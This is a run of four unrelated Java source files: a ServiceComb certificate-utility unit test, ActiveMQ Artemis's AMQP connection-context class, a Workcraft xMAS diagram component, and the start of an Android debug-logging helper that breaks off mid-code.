/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.servicecomb.foundation.ssl; import java.math.BigInteger; import java.security.InvalidKeyException; import java.security.NoSuchAlgorithmException; import java.security.NoSuchProviderException; import java.security.Principal; import java.security.PublicKey; import java.security.SignatureException; import java.security.cert.CertificateEncodingException; import java.security.cert.CertificateException; import java.security.cert.CertificateExpiredException; import java.security.cert.CertificateNotYetValidException; import java.security.cert.X509Certificate; import java.util.Date; import java.util.Set; import javax.security.auth.x500.X500Principal; import org.junit.After; import org.junit.Assert; import org.junit.Before; import org.junit.Test; import mockit.Expectations; import mockit.Mocked; public class CertificateUtilTest { class MyX509Certificate extends X509Certificate { private static final long serialVersionUID = -3585440601605666278L; public void checkValidity() throws CertificateExpiredException, CertificateNotYetValidException { } @Override public boolean hasUnsupportedCriticalExtension() { return false; } @Override public Set<String> getCriticalExtensionOIDs() { return null; } @Override public Set<String> getNonCriticalExtensionOIDs() { return null; } @Override public byte[] getExtensionValue(String oid) { return null; } @Override public void checkValidity(Date date) throws CertificateExpiredException, CertificateNotYetValidException { } @Override public int getVersion() { return 0; } @Override public BigInteger getSerialNumber() { return null; } @Override public Principal getIssuerDN() { return null; } @Override public Principal getSubjectDN() { return null; } @Override public Date getNotBefore() { return null; } @Override public Date getNotAfter() { return null; } @Override public byte[] getTBSCertificate() throws CertificateEncodingException { return null; } @Override public byte[] getSignature() { return null; } @Override public String getSigAlgName() { return null; } @Override public String getSigAlgOID() { return null; } @Override public byte[] getSigAlgParams() { return null; } @Override public boolean[] getIssuerUniqueID() { return null; } @Override public boolean[] getSubjectUniqueID() { return null; } @Override public boolean[] getKeyUsage() { return null; } @Override public int getBasicConstraints() { return 0; } @Override public byte[] getEncoded() throws CertificateEncodingException { return null; } @Override public void verify(PublicKey key) throws CertificateException, NoSuchAlgorithmException, InvalidKeyException, NoSuchProviderException, SignatureException { } @Override public void verify(PublicKey key, String sigProvider) throws CertificateException, NoSuchAlgorithmException, InvalidKeyException, NoSuchProviderException, SignatureException { } @Override public String toString() { return null; } @Override public PublicKey getPublicKey() { return null; } } @Before public void setUp() { } @After public void tearDown() { } @Test public void testGetCN(@Mocked X500Principal aX500Principal, @Mocked MyX509Certificate myX509Certificate) { new Expectations() { { aX500Principal.getName(); result = "CN=Test1234"; myX509Certificate.getSubjectX500Principal(); result = aX500Principal; } }; MyX509Certificate xxmyX509Certificate = new MyX509Certificate(); Set<String> strExpect = CertificateUtil.getCN(xxmyX509Certificate); Assert.assertEquals(true, strExpect.contains("Test1234")); } @Test public void testGetCNException(@Mocked X500Principal aX500Principal, @Mocked MyX509Certificate myX509Certificate) { new Expectations() { { aX500Principal.getName(); result = "NOCN=Test1234"; myX509Certificate.getSubjectX500Principal(); result = aX500Principal; } }; MyX509Certificate xxmyX509Certificate = new MyX509Certificate(); try { Set<String> strExpect = CertificateUtil.getCN(xxmyX509Certificate); Assert.assertEquals(strExpect.size(), 0); } catch (IllegalArgumentException e) { Assert.assertNotNull(null); } } @Test public void testFindOwner(@Mocked X500Principal aX500Principal1, @Mocked X500Principal aX500Principal2, @Mocked MyX509Certificate myX509Certificate) { new Expectations() { { aX500Principal1.getName(); result = "Huawei"; } { aX500Principal2.getName(); result = "Huawei"; } { myX509Certificate.getSubjectX500Principal(); result = aX500Principal1; myX509Certificate.getIssuerX500Principal(); result = aX500Principal2; } }; MyX509Certificate myX509Certificate1 = new MyX509Certificate(); MyX509Certificate myX509Certificate2 = new MyX509Certificate(); MyX509Certificate[] xxmyX509Certificate = new MyX509Certificate[2]; xxmyX509Certificate[0] = myX509Certificate1; xxmyX509Certificate[1] = myX509Certificate2; X509Certificate aX509Certificate = CertificateUtil.findOwner(xxmyX509Certificate); Assert.assertNull(aX509Certificate); } @Test public void testFindRootCAException(@Mocked X500Principal aX500Principal1, @Mocked X500Principal aX500Principal2, @Mocked MyX509Certificate myX509Certificate) { new Expectations() { { aX500Principal1.getName(); result = "Huawei1"; } { aX500Principal2.getName(); result = "Huawei3"; } { myX509Certificate.getSubjectX500Principal(); result = aX500Principal1; myX509Certificate.getIssuerX500Principal(); result = aX500Principal2; } }; MyX509Certificate myX509Certificate1 = new MyX509Certificate(); MyX509Certificate myX509Certificate2 = new MyX509Certificate(); MyX509Certificate[] xxmyX509Certificate = new MyX509Certificate[2]; xxmyX509Certificate[0] = myX509Certificate1; xxmyX509Certificate[1] = myX509Certificate2; try { X509Certificate aX509Certificate = CertificateUtil.findOwner(xxmyX509Certificate); Assert.assertNull(aX509Certificate); } catch (IllegalArgumentException e) { Assert.assertEquals("bad certificate chain: no root CA.", e.getMessage()); } } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.activemq.artemis.protocol.amqp.proton; import java.net.URI; import java.util.Arrays; import java.util.HashMap; import java.util.Map; import java.util.UUID; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.Future; import java.util.concurrent.FutureTask; import java.util.concurrent.ScheduledExecutorService; import java.util.concurrent.ThreadPoolExecutor; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import java.util.function.UnaryOperator; import io.netty.buffer.ByteBuf; import io.netty.channel.EventLoop; import org.apache.activemq.artemis.api.core.ActiveMQSecurityException; import org.apache.activemq.artemis.api.core.SimpleString; import org.apache.activemq.artemis.core.remoting.impl.netty.NettyConnection; import org.apache.activemq.artemis.core.remoting.impl.netty.TransportConstants; import org.apache.activemq.artemis.core.security.CheckType; import org.apache.activemq.artemis.core.security.SecurityAuth; import org.apache.activemq.artemis.protocol.amqp.broker.AMQPConnectionCallback; import org.apache.activemq.artemis.protocol.amqp.broker.AMQPSessionCallback; import org.apache.activemq.artemis.protocol.amqp.broker.ProtonProtocolManager; import org.apache.activemq.artemis.protocol.amqp.exceptions.ActiveMQAMQPException; import org.apache.activemq.artemis.protocol.amqp.logger.ActiveMQAMQPProtocolLogger; import org.apache.activemq.artemis.protocol.amqp.logger.ActiveMQAMQPProtocolMessageBundle; import org.apache.activemq.artemis.protocol.amqp.proton.handler.EventHandler; import org.apache.activemq.artemis.protocol.amqp.proton.handler.ExecutorNettyAdapter; import org.apache.activemq.artemis.protocol.amqp.proton.handler.ExtCapability; import org.apache.activemq.artemis.protocol.amqp.proton.handler.ProtonHandler; import org.apache.activemq.artemis.protocol.amqp.sasl.AnonymousServerSASL; import org.apache.activemq.artemis.protocol.amqp.sasl.ClientSASLFactory; import org.apache.activemq.artemis.protocol.amqp.sasl.PlainSASLResult; import org.apache.activemq.artemis.protocol.amqp.sasl.SASLResult; import org.apache.activemq.artemis.spi.core.protocol.RemotingConnection; import org.apache.activemq.artemis.spi.core.remoting.ReadyListener; import org.apache.activemq.artemis.utils.ByteUtil; import org.apache.activemq.artemis.utils.VersionLoader; import org.apache.qpid.proton.amqp.Symbol; import org.apache.qpid.proton.amqp.messaging.Source; import org.apache.qpid.proton.amqp.messaging.TerminusExpiryPolicy; import org.apache.qpid.proton.amqp.transaction.Coordinator; import org.apache.qpid.proton.amqp.transport.ErrorCondition; import org.apache.qpid.proton.engine.Connection; import org.apache.qpid.proton.engine.Delivery; import org.apache.qpid.proton.engine.EndpointState; import org.apache.qpid.proton.engine.Link; import org.apache.qpid.proton.engine.Receiver; import org.apache.qpid.proton.engine.Sender; import org.apache.qpid.proton.engine.Session; import org.apache.qpid.proton.engine.Transport; import org.jboss.logging.Logger; import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.FAILOVER_SERVER_LIST; import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.HOSTNAME; import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.NETWORK_HOST; import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.PORT; import static org.apache.activemq.artemis.protocol.amqp.proton.AmqpSupport.SCHEME; public class AMQPConnectionContext extends ProtonInitializable implements EventHandler { private static final Logger log = Logger.getLogger(AMQPConnectionContext.class); public static final Symbol CONNECTION_OPEN_FAILED = Symbol.valueOf("amqp:connection-establishment-failed"); public static final String AMQP_CONTAINER_ID = "amqp-container-id"; private static final FutureTask<Void> VOID_FUTURE = new FutureTask<>(() -> { }, null); protected final ProtonHandler handler; private AMQPConnectionCallback connectionCallback; private final String containerId; private final boolean isIncomingConnection; private final ClientSASLFactory saslClientFactory; private final Map<Symbol, Object> connectionProperties = new HashMap<>(); private final ScheduledExecutorService scheduledPool; private final Map<Session, AMQPSessionContext> sessions = new ConcurrentHashMap<>(); private final ProtonProtocolManager protocolManager; private final boolean useCoreSubscriptionNaming; /** Outgoing means created by the AMQP Bridge */ private final boolean bridgeConnection; private final ScheduleOperator scheduleOp = new ScheduleOperator(new ScheduleRunnable()); private final AtomicReference<Future<?>> scheduledFutureRef = new AtomicReference(VOID_FUTURE); public AMQPConnectionContext(ProtonProtocolManager protocolManager, AMQPConnectionCallback connectionSP, String containerId, int idleTimeout, int maxFrameSize, int channelMax, boolean useCoreSubscriptionNaming, ScheduledExecutorService scheduledPool, boolean isIncomingConnection, ClientSASLFactory saslClientFactory, Map<Symbol, Object> connectionProperties) { this(protocolManager, connectionSP, containerId, idleTimeout, maxFrameSize, channelMax, useCoreSubscriptionNaming, scheduledPool, isIncomingConnection, saslClientFactory, connectionProperties, false); } public AMQPConnectionContext(ProtonProtocolManager protocolManager, AMQPConnectionCallback connectionSP, String containerId, int idleTimeout, int maxFrameSize, int channelMax, boolean useCoreSubscriptionNaming, ScheduledExecutorService scheduledPool, boolean isIncomingConnection, ClientSASLFactory saslClientFactory, Map<Symbol, Object> connectionProperties, boolean bridgeConnection) { this.protocolManager = protocolManager; this.bridgeConnection = bridgeConnection; this.connectionCallback = connectionSP; this.useCoreSubscriptionNaming = useCoreSubscriptionNaming; this.containerId = (containerId != null) ? containerId : UUID.randomUUID().toString(); this.isIncomingConnection = isIncomingConnection; this.saslClientFactory = saslClientFactory; this.connectionProperties.put(AmqpSupport.PRODUCT, "apache-activemq-artemis"); this.connectionProperties.put(AmqpSupport.VERSION, VersionLoader.getVersion().getFullVersion()); if (connectionProperties != null) { this.connectionProperties.putAll(connectionProperties); } this.scheduledPool = scheduledPool; connectionCallback.setConnection(this); EventLoop nettyExecutor; if (connectionCallback.getTransportConnection() instanceof NettyConnection) { nettyExecutor = ((NettyConnection) connectionCallback.getTransportConnection()).getNettyChannel().eventLoop(); } else { nettyExecutor = new ExecutorNettyAdapter(protocolManager.getServer().getExecutorFactory().getExecutor()); } this.handler = new ProtonHandler(nettyExecutor, protocolManager.getServer().getExecutorFactory().getExecutor(), isIncomingConnection && saslClientFactory == null); handler.addEventHandler(this); Transport transport = handler.getTransport(); transport.setEmitFlowEventOnSend(false); if (idleTimeout > 0) { transport.setIdleTimeout(idleTimeout); } transport.setChannelMax(channelMax); transport.setInitialRemoteMaxFrameSize(protocolManager.getInitialRemoteMaxFrameSize()); transport.setMaxFrameSize(maxFrameSize); transport.setOutboundFrameSizeLimit(maxFrameSize); if (saslClientFactory != null) { handler.createClientSASL(); } } public boolean isBridgeConnection() { return bridgeConnection; } public void requireInHandler() { handler.requireHandler(); } public boolean isHandler() { return handler.isHandler(); } public void scheduledFlush() { handler.scheduledFlush(); } public boolean isIncomingConnection() { return isIncomingConnection; } public ClientSASLFactory getSaslClientFactory() { return saslClientFactory; } protected AMQPSessionContext newSessionExtension(Session realSession) throws ActiveMQAMQPException { AMQPSessionCallback sessionSPI = connectionCallback.createSessionCallback(this); AMQPSessionContext protonSession = new AMQPSessionContext(sessionSPI, this, realSession, protocolManager.getServer()); return protonSession; } public SecurityAuth getSecurityAuth() { return new LocalSecurity(); } public SASLResult getSASLResult() { return handler.getSASLResult(); } public void inputBuffer(ByteBuf buffer) { if (log.isTraceEnabled()) { ByteUtil.debugFrame(log, "Buffer Received ", buffer); } handler.inputBuffer(buffer); } public ProtonHandler getHandler() { return handler; } public void destroy() { handler.runLater(() -> connectionCallback.close()); } public boolean isSyncOnFlush() { return false; } public void instantFlush() { handler.instantFlush(); } public void flush() { handler.flush(); } public void afterFlush(Runnable runnable) { handler.afterFlush(runnable); } public void close(ErrorCondition errorCondition) { Future<?> scheduledFuture = scheduledFutureRef.getAndSet(null); if (scheduledPool instanceof ThreadPoolExecutor && scheduledFuture != null && scheduledFuture != VOID_FUTURE && scheduledFuture instanceof Runnable) { if (!((ThreadPoolExecutor) scheduledPool).remove((Runnable) scheduledFuture) && !scheduledFuture.isCancelled() && !scheduledFuture.isDone()) { ActiveMQAMQPProtocolLogger.LOGGER.cantRemovingScheduledTask(); } } handler.close(errorCondition, this); } public AMQPSessionContext getSessionExtension(Session realSession) throws ActiveMQAMQPException { AMQPSessionContext sessionExtension = sessions.get(realSession); if (sessionExtension == null) { // how this is possible? Log a warn here sessionExtension = newSessionExtension(realSession); realSession.setContext(sessionExtension); sessions.put(realSession, sessionExtension); } return sessionExtension; } public void runOnPool(Runnable run) { handler.runOnPool(run); } public void runNow(Runnable run) { handler.runNow(run); } public void runLater(Runnable run) { handler.runLater(run); } protected boolean validateConnection(Connection connection) { return connectionCallback.validateConnection(connection, handler.getSASLResult()); } public boolean checkDataReceived() { return handler.checkDataReceived(); } public long getCreationTime() { return handler.getCreationTime(); } public String getRemoteContainer() { return handler.getConnection().getRemoteContainer(); } public String getPubSubPrefix() { return null; } protected void initInternal() throws Exception { } public AMQPConnectionCallback getConnectionCallback() { return connectionCallback; } protected void remoteLinkOpened(Link link) throws Exception { AMQPSessionContext protonSession = getSessionExtension(link.getSession()); if (link.getLocalState() == EndpointState.ACTIVE) { // if already active it's probably from the AMQP bridge and hence we just ignore it return; } link.setSource(link.getRemoteSource()); link.setTarget(link.getRemoteTarget()); if (link instanceof Receiver) { Receiver receiver = (Receiver) link; if (link.getRemoteTarget() instanceof Coordinator) { Coordinator coordinator = (Coordinator) link.getRemoteTarget(); protonSession.addTransactionHandler(coordinator, receiver); } else { if (isReplicaTarget(receiver)) { try { protonSession.getSessionSPI().check(SimpleString.toSimpleString(ProtonProtocolManager.MIRROR_ADDRESS), CheckType.SEND, getSecurityAuth()); } catch (ActiveMQSecurityException e) { throw ActiveMQAMQPProtocolMessageBundle.BUNDLE.securityErrorCreatingProducer(e.getMessage()); } protonSession.addReplicaTarget(receiver); } else { protonSession.addReceiver(receiver); } } } else { Sender sender = (Sender) link; protonSession.addSender(sender); } } private boolean isReplicaTarget(Link link) { return link != null && link.getTarget() != null && link.getTarget().getAddress() != null && link.getTarget().getAddress().equals(ProtonProtocolManager.MIRROR_ADDRESS); } public Symbol[] getConnectionCapabilitiesOffered() { URI tc = connectionCallback.getFailoverList(); if (tc != null) { Map<Symbol, Object> hostDetails = new HashMap<>(); hostDetails.put(NETWORK_HOST, tc.getHost()); boolean isSSL = tc.getQuery().contains(TransportConstants.SSL_ENABLED_PROP_NAME + "=true"); if (isSSL) { hostDetails.put(SCHEME, "amqps"); } else { hostDetails.put(SCHEME, "amqp"); } hostDetails.put(HOSTNAME, tc.getHost()); hostDetails.put(PORT, tc.getPort()); connectionProperties.put(FAILOVER_SERVER_LIST, Arrays.asList(hostDetails)); } return ExtCapability.getCapabilities(); } public void open() { handler.open(containerId, connectionProperties); } public String getContainer() { return containerId; } public void addEventHandler(EventHandler eventHandler) { handler.addEventHandler(eventHandler); } public ProtonProtocolManager getProtocolManager() { return protocolManager; } public int getAmqpLowCredits() { if (protocolManager != null) { return protocolManager.getAmqpLowCredits(); } else { // this is for tests only... return AmqpSupport.AMQP_LOW_CREDITS_DEFAULT; } } public int getAmqpCredits() { if (protocolManager != null) { return protocolManager.getAmqpCredits(); } else { // this is for tests only... return AmqpSupport.AMQP_CREDITS_DEFAULT; } } public boolean isUseCoreSubscriptionNaming() { return useCoreSubscriptionNaming; } @Override public void onAuthInit(ProtonHandler handler, Connection connection, boolean sasl) { if (sasl) { // configured mech in decreasing order of preference String[] mechanisms = connectionCallback.getSaslMechanisms(); if (mechanisms == null || mechanisms.length == 0) { mechanisms = AnonymousServerSASL.ANONYMOUS_MECH; } handler.createServerSASL(mechanisms); } else { if (!connectionCallback.isSupportsAnonymous()) { connectionCallback.sendSASLSupported(); connectionCallback.close(); handler.close(null, this); } } } @Override public void onSaslRemoteMechanismChosen(ProtonHandler handler, String mech) { handler.setChosenMechanism(connectionCallback.getServerSASL(mech)); } @Override public void onSaslMechanismsOffered(final ProtonHandler handler, final String[] mechanisms) { if (saslClientFactory != null) { handler.setClientMechanism(saslClientFactory.chooseMechanism(mechanisms)); } } @Override public void onAuthFailed(final ProtonHandler protonHandler, final Connection connection) { connectionCallback.close(); handler.close(null, this); } @Override public void onAuthSuccess(final ProtonHandler protonHandler, final Connection connection) { connection.open(); } @Override public void onTransport(Transport transport) { handler.flushBytes(); } @Override public void pushBytes(ByteBuf bytes) { connectionCallback.onTransport(bytes, this); } @Override public boolean flowControl(ReadyListener readyListener) { return connectionCallback.isWritable(readyListener); } @Override public String getRemoteAddress() { return connectionCallback.getTransportConnection().getRemoteAddress(); } @Override public void onRemoteOpen(Connection connection) throws Exception { handler.requireHandler(); try { initInternal(); } catch (Exception e) { log.error("Error init connection", e); } if (!validateConnection(connection)) { connection.close(); } else { connection.setContext(AMQPConnectionContext.this); connection.setContainer(containerId); connection.setProperties(connectionProperties); connection.setOfferedCapabilities(getConnectionCapabilitiesOffered()); connection.open(); } initialize(); /* * This can be null which is in effect an empty map, also we really don't need to check this for in bound connections * but its here in case we add support for outbound connections. * */ if (connection.getRemoteProperties() == null || !connection.getRemoteProperties().containsKey(CONNECTION_OPEN_FAILED)) { long nextKeepAliveTime = handler.tick(true); if (nextKeepAliveTime != 0 && scheduledPool != null) { scheduleOp.setDelay(nextKeepAliveTime - TimeUnit.NANOSECONDS.toMillis(System.nanoTime())); scheduledFutureRef.getAndUpdate(scheduleOp); } } } class ScheduleOperator implements UnaryOperator<Future<?>> { private long delay; final ScheduleRunnable scheduleRunnable; ScheduleOperator(ScheduleRunnable scheduleRunnable) { this.scheduleRunnable = scheduleRunnable; } @Override public Future<?> apply(Future<?> future) { return (future != null) ? scheduledPool.schedule(scheduleRunnable, delay, TimeUnit.MILLISECONDS) : null; } public void setDelay(long delay) { this.delay = delay; } } class TickerRunnable implements Runnable { @Override public void run() { Long rescheduleAt = handler.tick(false); if (rescheduleAt == null) { // this mean tick could not acquire a lock, we will just retry in 10 milliseconds. scheduleOp.setDelay(10); scheduledFutureRef.getAndUpdate(scheduleOp); } else if (rescheduleAt != 0) { scheduleOp.setDelay(rescheduleAt - TimeUnit.NANOSECONDS.toMillis(System.nanoTime())); scheduledFutureRef.getAndUpdate(scheduleOp); } } } class ScheduleRunnable implements Runnable { final TickerRunnable tickerRunnable = new TickerRunnable(); @Override public void run() { // The actual tick has to happen within a Netty Worker, to avoid requiring a lock // this will also be used to flush the data directly into netty connection's executor handler.runLater(tickerRunnable); } } @Override public void onRemoteClose(Connection connection) { handler.requireHandler(); connection.close(); connection.free(); for (AMQPSessionContext protonSession : sessions.values()) { protonSession.close(); } sessions.clear(); // We must force write the channel before we actually destroy the connection handler.flushBytes(); destroy(); } @Override public void onLocalOpen(Session session) throws Exception { AMQPSessionContext sessionContext = getSessionExtension(session); if (bridgeConnection) { sessionContext.initialize(); } } @Override public void onRemoteOpen(Session session) throws Exception { handler.requireHandler(); getSessionExtension(session).initialize(); session.open(); } @Override public void onRemoteClose(Session session) throws Exception { handler.runLater(() -> { session.close(); session.free(); AMQPSessionContext sessionContext = (AMQPSessionContext) session.getContext(); if (sessionContext != null) { sessionContext.close(); sessions.remove(session); session.setContext(null); } }); } @Override public void onRemoteOpen(Link link) throws Exception { remoteLinkOpened(link); } @Override public void onFlow(Link link) throws Exception { if (link.getContext() != null) { ((ProtonDeliveryHandler) link.getContext()).onFlow(link.getCredit(), link.getDrain()); } } @Override public void onRemoteClose(Link link) throws Exception { handler.requireHandler(); // We scheduled it for later, as that will work through anything that's pending on the current deliveries. runNow(() -> { ProtonDeliveryHandler linkContext = (ProtonDeliveryHandler) link.getContext(); if (linkContext != null) { try { linkContext.close(true); } catch (Exception e) { log.error(e.getMessage(), e); } } /// we have to perform the link.close after the linkContext.close is finished. // linkeContext.close will perform a few executions on the netty loop, // this has to come next runLater(() -> { link.close(); link.free(); flush(); }); }); } @Override public void onRemoteDetach(Link link) throws Exception { handler.requireHandler(); boolean handleAsClose = link.getSource() != null && ((Source) link.getSource()).getExpiryPolicy() == TerminusExpiryPolicy.LINK_DETACH; if (handleAsClose) { onRemoteClose(link); } else { link.detach(); link.free(); } } @Override public void onLocalDetach(Link link) throws Exception { handler.requireHandler(); Object context = link.getContext(); if (context instanceof ProtonServerSenderContext) { ProtonServerSenderContext senderContext = (ProtonServerSenderContext) context; senderContext.close(false); } } @Override public void onDelivery(Delivery delivery) throws Exception { handler.requireHandler(); ProtonDeliveryHandler handler = (ProtonDeliveryHandler) delivery.getLink().getContext(); if (handler != null) { handler.onMessage(delivery); } else { log.warn("Handler is null, can't delivery " + delivery, new Exception("tracing location")); } } private class LocalSecurity implements SecurityAuth { @Override public String getUsername() { String username = null; SASLResult saslResult = getSASLResult(); if (saslResult != null) { username = saslResult.getUser(); } return username; } @Override public String getPassword() { String password = null; SASLResult saslResult = getSASLResult(); if (saslResult != null) { if (saslResult instanceof PlainSASLResult) { password = ((PlainSASLResult) saslResult).getPassword(); } } return password; } @Override public RemotingConnection getRemotingConnection() { return connectionCallback.getProtonConnectionDelegate(); } @Override public String getSecurityDomain() { return getProtocolManager().getSecurityDomain(); } } }
package org.workcraft.plugins.xmas.components; import org.workcraft.dom.Container; import org.workcraft.dom.DefaultGroupImpl; import org.workcraft.dom.Node; import org.workcraft.dom.visual.*; import org.workcraft.gui.properties.PropertyDeclaration; import org.workcraft.gui.tools.Decoration; import org.workcraft.observation.*; import org.workcraft.plugins.builtin.settings.VisualCommonSettings; import org.workcraft.plugins.xmas.XmasSettings; import org.workcraft.plugins.xmas.components.XmasContact.IOType; import org.workcraft.utils.ColorUtils; import java.awt.*; import java.awt.geom.AffineTransform; import java.awt.geom.Point2D; import java.awt.geom.Rectangle2D; import java.util.ArrayList; import java.util.Collection; public abstract class VisualXmasComponent extends VisualComponent implements Container, StateObserver, ObservableHierarchy { public static final String DEGREE_SYMBOL = Character.toString((char) 0x00B0); public static final double SIZE = VisualCommonSettings.getNodeSize(); public static final double TOKEN_SIZE = 0.18 * SIZE; private static final String PROPERTY_ORIENTATION = "Orientation"; public enum Orientation { ORIENTATION_0("0" + DEGREE_SYMBOL, 0), ORIENTATION_90("90" + DEGREE_SYMBOL, 1), ORIENTATION_180("180" + DEGREE_SYMBOL, 2), ORIENTATION_270("270" + DEGREE_SYMBOL, 3); private final String name; private final int quadrant; Orientation(String name, int quadrant) { this.name = name; this.quadrant = quadrant; } public int getQuadrant() { return quadrant; } @Override public String toString() { return name; } public Orientation rotateClockwise() { switch (this) { case ORIENTATION_0: return ORIENTATION_90; case ORIENTATION_90: return ORIENTATION_180; case ORIENTATION_180: return ORIENTATION_270; case ORIENTATION_270: return ORIENTATION_0; default: return this; } } public Orientation rotateCounterclockwise() { switch (this) { case ORIENTATION_0: return ORIENTATION_270; case ORIENTATION_90: return ORIENTATION_0; case ORIENTATION_180: return ORIENTATION_90; case ORIENTATION_270: return ORIENTATION_180; default: return this; } } public Orientation flipHorizontal() { switch (this) { case ORIENTATION_0: return ORIENTATION_180; case ORIENTATION_180: return ORIENTATION_0; default: return this; } } public Orientation flipVertical() { switch (this) { case ORIENTATION_90: return ORIENTATION_270; case ORIENTATION_270: return ORIENTATION_90; default: return this; } } }; private Orientation orientation = Orientation.ORIENTATION_0; protected DefaultGroupImpl groupImpl = new DefaultGroupImpl(this); public VisualXmasComponent(XmasComponent component) { super(component); component.addObserver(this); addPropertyDeclarations(); } private void addPropertyDeclarations() { addPropertyDeclaration(new PropertyDeclaration<>(Orientation.class, PROPERTY_ORIENTATION, this::setOrientation, this::getOrientation).setCombinable().setTemplatable()); } @Override public XmasComponent getReferencedComponent() { return (XmasComponent) super.getReferencedComponent(); } public Orientation getOrientation() { return orientation; } public void setOrientation(Orientation value) { if (orientation != value) { for (VisualXmasContact contact: getContacts()) { AffineTransform rotateTransform = new AffineTransform(); rotateTransform.quadrantRotate(value.getQuadrant() - getOrientation().getQuadrant()); TransformHelper.applyTransform(contact, rotateTransform); } orientation = value; sendNotification(new PropertyChangedEvent(this, PROPERTY_ORIENTATION)); } } public Collection<VisualXmasContact> getContacts() { ArrayList<VisualXmasContact> result = new ArrayList<>(); for (Node n: getChildren()) { if (n instanceof VisualXmasContact) { result.add((VisualXmasContact) n); } } return result; } public void addContact(VisualXmasContact vc) { if (!getChildren().contains(vc)) { getReferencedComponent().add(vc.getReferencedComponent()); add(vc); } } public void setContactPosition(VisualXmasContact vc, Positioning positioning) { double size2 = VisualCommonSettings.getNodeSize() / 2.0; vc.setPosition(new Point2D.Double(size2 * positioning.xSign, size2 * positioning.ySign)); } @Override public Rectangle2D getInternalBoundingBoxInLocalSpace() { return transformShape(getShape()).getBounds2D(); } @Override public Rectangle2D getBoundingBoxInLocalSpace() { Rectangle2D bb = super.getBoundingBoxInLocalSpace(); for (VisualXmasContact c: getContacts()) { Rectangle2D.union(bb, c.getBoundingBox(), bb); } return bb; } @Override public void add(Node node) { groupImpl.add(node); if (node instanceof VisualXmasContact) { ((VisualXmasContact) node).addObserver(this); } } @Override public Collection<Node> getChildren() { return groupImpl.getChildren(); } @Override public Node getParent() { return groupImpl.getParent(); } @Override public void setParent(Node parent) { groupImpl.setParent(parent); } @Override public void remove(Node node) { } @Override public void add(Collection<? extends Node> nodes) { for (Node x : nodes) { add(x); } } @Override public void remove(Collection<? extends Node> nodes) { } @Override public void reparent(Collection<? extends Node> nodes, Container newParent) { groupImpl.reparent(nodes, newParent); } @Override public void reparent(Collection<? extends Node> nodes) { groupImpl.reparent(nodes); } @Override public void notify(StateEvent e) { } public VisualXmasContact createInput(Positioning positioning) { VisualXmasContact contact = new VisualXmasContact(new XmasContact(IOType.INPUT)); addContact(contact); setContactPosition(contact, positioning); return contact; } public VisualXmasContact createOutput(Positioning positioning) { VisualXmasContact contact = new VisualXmasContact(new XmasContact(IOType.OUTPUT)); addContact(contact); setContactPosition(contact, positioning); return contact; } @Override public void addObserver(HierarchyObserver obs) { groupImpl.addObserver(obs); } @Override public void removeObserver(HierarchyObserver obs) { groupImpl.removeObserver(obs); } @Override public void removeAllObservers() { groupImpl.removeAllObservers(); } @Override public abstract Shape getShape(); public Shape transformShape(Shape shape) { AffineTransform rotateTransform = new AffineTransform(); if (orientation != null) { rotateTransform.quadrantRotate(orientation.getQuadrant()); } return rotateTransform.createTransformedShape(shape); } @Override public void draw(DrawRequest r) { Graphics2D g = r.getGraphics(); Decoration d = r.getDecoration(); g.setColor(ColorUtils.colorise(getForegroundColor(), d.getColorisation())); g.setStroke(new BasicStroke((float) XmasSettings.getBorderWidth())); g.draw(transformShape(getShape())); drawNameInLocalSpace(r); drawLabelInLocalSpace(r); } @Override public void copyStyle(Stylable src) { super.copyStyle(src); if (src instanceof VisualXmasComponent) { VisualXmasComponent srcComponent = (VisualXmasComponent) src; setOrientation(srcComponent.getOrientation()); } } @Override public void rotateClockwise() { setOrientation(getOrientation().rotateClockwise()); super.rotateClockwise(); } @Override public void rotateCounterclockwise() { setOrientation(getOrientation().rotateCounterclockwise()); super.rotateCounterclockwise(); } @Override public void flipHorizontal() { setOrientation(getOrientation().flipHorizontal()); super.flipHorizontal(); } @Override public void flipVertical() { setOrientation(getOrientation().flipVertical()); super.flipVertical(); } }
package com.evature.evasdk.util; import java.util.ArrayList; /**** * Class to show Debug Logs - similar to android.util.Log * * 1. Log text is appended with (file:line) - making the log line * double-clickable in Eclipse LogCat (jumps to logging source code) * 2. All logs can disabled with a single boolean flag * 3. Log listener can be added - making it possible to add custom * logic everywhere an error log is called. * * @author iftah */ public class DLog { // level constants public enum LogLevel { VERBOSE, DEBUG, INFO, WARN, ERROR, WTF } static public boolean DebugMode = false; public interface LogListener { /*** * @param level - see level constants above * @param debugMode * - true when the application has set DLog to DebugMode * @param tag * @param text * @param callingInfo * - "(file:line)" - location of the calling code */ void logActivated(LogLevel level, boolean debugMode, String tag, String text, String callingInfo); void logActivated(LogLevel level, boolean debugMode, String tag, String text, String callingInfo, Throwable e); } private static ArrayList<LogListener> listeners = new ArrayList<LogListener>(); private static String getCallingInfo() { return getCallingInfo(5); } private static String getCallingInfo(int upframes) { try { StackTraceElement stackTraceElement = Thread.currentThread() .getStackTrace()[upframes]; String fullClassName = stackTraceElement.getClassName(); String className = fullClassName.substring(fullClassName .lastIndexOf(".") + 1); // String methodName = stackTraceElement.getMethodName(); int lineNumber = stackTraceElement.getLineNumber(); return "(" + className + ".java:" + lineNumber + ")"; } catch (Exception e) { return ""; } } public static synchronized void registerLogListener(LogListener 